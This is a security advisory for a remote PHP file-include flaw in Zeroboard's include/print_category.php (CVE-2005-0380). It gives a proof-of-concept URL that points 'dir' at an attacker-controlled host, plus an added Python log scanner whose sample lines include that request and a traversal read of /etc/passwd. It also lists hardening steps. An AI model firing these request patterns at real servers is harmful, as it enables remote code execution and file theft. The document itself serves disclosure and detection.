Zeroboard Print_Category.PHP Remote File Include Vulnerability
BID:12258
Info
| Bugtraq ID: | 12258 |
| Class: | Input Validation Error |
| CVE: | CVE-2005-0380 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 13 2005 12:00AM |
| Updated: | Jul 12 2009 09:27AM |
| Credit: | Discovery of this vulnerability is credited to Jeremy Bae at STG Security. |
| Vulnerable: | Zeroboard 4.1 pl5, Zeroboard 4.1 pl4, Zeroboard 4.1 pl3, Zeroboard 4.1 pl2 |
| Not Vulnerable: | |
Discussion
Zeroboard is reportedly affected by a remote PHP file include vulnerability. The script 'include/print_category.php' uses the 'dir' variable to build the path it includes without validating that value, and the script can be requested directly rather than only through the Zeroboard pages that normally include it.
A remote attacker who sets 'dir' to a URL under their control (with 'setup[use_category]=1' supplied to reach the include, as in the proof of concept) can make the server fetch and execute an arbitrary PHP script in the context of the web server process hosting Zeroboard. The proof of concept relies on both the 'setup' array and 'dir' being populated from the query string, which is the behaviour of PHP's register_globals setting; fetching the remote script additionally requires allow_url_fopen (or allow_url_include on PHP 5.2 and later) to be enabled, so the issue is exploitable as described only under that configuration.
Exploit / POC
No exploit is required and the following proof of concept is available:
http://www.example.com/[zeroboard]/include/print_category.php?setup[use_category]=1&dir=http://[attacker]/
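As an added example (not part of the original advisory and not Zeroboard code), the following Python scans combined-format web access logs for requests shaped like the proof of concept above: a hit on include/print_category.php whose 'dir' carries a URL scheme, or whose query sets a 'setup[...]' key. The log lines are constructed for the example and use documentation address ranges. It goes beyond the page's remote-include case in one respect: it also flags traversal sequences or absolute paths in 'dir', since the same unvalidated include accepts those.

```python
"""Flag include-injection attempts against Zeroboard's include/print_category.php
in combined-format web access logs (detection example; not Zeroboard code)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample traffic for this example (documentation IP ranges, not real hosts).
SAMPLE_LOG = """\
203.0.113.5 - - [13/Jan/2005:10:01:02 +0000] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://198.51.100.7/ HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [13/Jan/2005:10:01:05 +0000] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=ftp%3A%2F%2F198.51.100.7%2Fx HTTP/1.0" 200 512 "-" "Mozilla/4.0"
198.51.100.20 - - [13/Jan/2005:10:02:00 +0000] "GET /bbs/zboard.php?id=notice HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.20 - - [13/Jan/2005:10:02:30 +0000] "GET /bbs/include/print_category.php?dir=../../../../etc/passwd HTTP/1.1" 200 100 "-" "curl/7.10"
"""

# Apache/nginx "combined" format: client, ident, user, [time], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Any URL scheme at the start of the include path: http:, https:, ftp:, php:, data:, ...
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.IGNORECASE)
TARGET_SCRIPT = "/include/print_category.php"


def classify(target: str):
    """Return a description of why the request target is suspicious, or None.

    Only requests for print_category.php are examined. parse_qsl() percent-decodes
    parameter names and values, so the URL-encoded form of the attack is caught too.
    """
    parts = urlsplit(target)
    if not parts.path.lower().endswith(TARGET_SCRIPT):
        return None
    reasons = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == "dir":
            if SCHEME_RE.match(value):
                reasons.append("remote include: dir=" + value)
            elif ".." in value or value.startswith("/"):
                reasons.append("traversal/local include: dir=" + value)
        elif name.startswith("setup["):
            # $setup is Zeroboard's own configuration array; a client has no
            # legitimate reason to set it, so any such key is a register_globals probe.
            reasons.append("register_globals override: " + name)
    return "; ".join(reasons) or None


def scan(log_text: str):
    """Return (client_ip, target, reason) for every suspicious request in the log."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reason = classify(m["target"])
        if reason:
            hits.append((m["ip"], m["target"], reason))
    return hits


if __name__ == "__main__":
    for ip, target, reason in scan(SAMPLE_LOG):
        print(f"{ip}\t{reason}\n\t{target}")
```

Run it against a real log with scan(open(path).read()); the tuples are easy to group by client address or forward to a SIEM. Matching on the decoded query rather than on the raw line is the important design choice: the second sample line is the same attack with every delimiter percent-encoded, and a plain substring match on "dir=http://" would miss it.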
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Until a fixed release is available, the following reduce exposure: run PHP with register_globals off, so that 'setup' and 'dir' cannot be populated from the query string; disable allow_url_fopen (and allow_url_include on PHP 5.2 and later), which stops include() from fetching http:// or ftp:// targets even when the path is attacker-controlled; and deny direct web access to Zeroboard's include/ directory so that print_category.php is reachable only from the scripts that include it.
References
References: